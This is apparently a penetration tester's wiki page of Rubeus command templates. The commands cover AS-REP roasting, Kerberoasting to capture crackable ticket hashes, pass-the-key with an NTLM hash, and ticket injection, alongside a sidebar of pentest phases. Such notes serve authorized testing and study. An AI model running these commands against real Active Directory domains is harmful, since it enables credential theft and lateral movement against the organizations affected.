Skip to content
TheGetch edited this page Jan 5, 2021 · 1 revision

Rubeus

Rubeus

Source

Review the opsec notes before compiling the program in visual studio.

ASREProasting:

chek for users in the current domain:

  • Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>

Kerberoasting:

  • Rubeus.exe kerberoast /outfile:<output_TGSs_file>

  • Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."]

Pass the key (PTK):

  • .\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

Using the ticket on a Windows target:

  • Rubeus.exe ptt /ticket:<ticket_kirbi_file>

_Sidebar

1. Recon

Ping Sweep

CIDR to IP

2. Enumeration

Services

05. HTTP (80,443,8080,8443,etc.)

3. Exploitation

4. Post Exploiation

5. High Value Information

Hashes

6. Reporting

7. Random Notes/Useful Tidbits

Clone this wiki locally